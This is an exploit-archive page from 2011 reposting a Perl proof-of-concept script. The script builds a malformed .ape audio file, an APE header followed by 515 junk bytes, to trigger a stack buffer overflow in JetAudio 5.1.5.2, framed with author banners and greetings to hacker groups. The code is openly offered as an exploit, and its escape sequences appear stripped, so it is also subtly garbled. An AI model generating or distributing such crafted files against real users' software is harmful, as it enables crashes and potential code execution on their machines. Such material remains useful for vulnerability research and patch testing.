Home / exploits Jet Audio 5.1.5.2 APE Buffer Overflow
Posted on 11 March 2011
#!/usr/bin/perl ### # Title : JetAudio v5.1.5.2 (.ape) Stack Buffer Overflow # Author : KedAns-Dz # E-mail : ked-h@hotmail.com # Home : HMD/AM (30008/04300) - Algeria -(00213555248701) # Twitter page : twitter.com/kedans # platform : Windows # Software Link: [http://www.jetaudio.com] # Impact : Stack Overflow in 'JetAudio.exe' Process # Tested on : Windows XP SP3 Français # Target : JetAudio v5.1.5.2 ### # Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all ) # ------------ # Usage : 1 - Creat APE file ( Monkey's Audio Format ) # => 2 - Open APE file With JetAudio 5.1 # => 3 - OverFlow !!! # Assembly Errur in : { # [idiv] eax ,ecx ; 0x01B11BBD "xf7xf9" # [int] ; 0x41 * 515 bytes # } # ------------ #START SYSTEM /root@MSdos/ : system("title KedAns-Dz"); system("color 1e"); system("cls"); print " "; print " |===========================================================| "; print " |= [!] Name : JetAudio 5.1 (.ape) Monkey's Audio Format =| "; print " |= [!] Exploit : Stack Buffer Overflow =| "; print " |= [!] Author : KedAns-Dz =| "; print " |= [!] Mail: Ked-h(at)hotmail(dot)com =| "; print " |===========================================================| "; sleep(2); print " "; # Creating ... my $PoC = "x4Dx41x43x20x96x0fx00x00x34x00x00x00x18x00x00x00"; # APE Header my $Junk = "x41" x 515 ; # Junk open(file , ">", "Kedans.ape"); # Evil File APE (531 bytes) 4.0 KB print file $PoC.$Junk; print " [+] File successfully created! " or die print " [-] OpsS! File is Not Created !! "; close(file); #================[ Exploited By KedAns-Dz * HST-Dz * ]========================= # Special Greets to : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > # Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{ # Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz * His0k4 * Dr.0rYX # Cr3w-DZ * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} , # [ Special Greets to 3 em EnGineering Electric Class , BACALORIA 2011 Enchallah # Messas Secondary School - Ain mlilla - 04300 - Algeria ] , # Greets All Bad Boys (cité 1850 logts - HassiMessaouD - 30008 -Algeria ) , # hotturks.org : TeX * KadaVra ... all Others # Kelvin.Xgr ( kelvinx.net) #===========================================================================
